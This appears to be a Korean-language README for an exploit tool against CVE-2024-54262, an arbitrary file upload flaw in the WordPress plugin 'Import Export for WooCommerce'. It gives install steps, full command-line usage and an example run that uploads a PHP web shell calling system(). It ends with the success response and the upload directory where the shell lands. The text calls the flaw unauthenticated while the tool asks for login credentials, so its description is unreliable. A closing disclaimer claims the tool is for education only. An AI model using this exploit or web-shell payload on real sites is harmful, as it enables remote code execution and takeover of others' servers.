
CVE-2024-54262 익스플로잇: WooCommerce용 Import Export의 임의 파일 업로드
CVE-2024-54262 익스플로잇: Import Export for WooCommerce의 임의 파일 업로드
이 스크립트는 WordPress 플러그인 "Import Export for WooCommerce"의 취약점을 악용합니다. 이 취약점은 인증되지 않은 사용자가 임의의 파일을 업로드하여 잠재적인 원격 코드 실행(RCE)으로 이어질 수 있게 합니다.
requestsargparse다음 명령으로 의존성을 설치하세요:
pip install requests
3.대상 WordPress 사이트가 취약한 버전의 플러그인을 사용 중인지 확인하세요.
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]
Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce
options:
-h, --help show this help message and exit
--url URL, -u URL Base URL of the WordPress site
--username USERNAME, -un USERNAME
Username for login
--password PASSWORD, -p PASSWORD
Password for login
--command COMMAND, -c COMMAND
PHP shell code to upload
CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"
{
"status": true,
"code": 104,
"message": "Success",
"data": {
"file_name": "import_manual_1737090262.php",
"total_requests": 1,
"import_columns": "all",
"product_search_type": "SKU",
"product_operation": "create_new_update_existing",
"field_separator": ","
}
}
import_manual_1737090262.phpwp-content/uploads/import-export-for-woocommerce/product/이 도구는 교육 목적으로만 제공됩니다. 작성자는 이 스크립트로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 명시적 허가 없이 시스템에 무단으로 접근하거나 악용하는 것은 불법적이며 비윤리적입니다.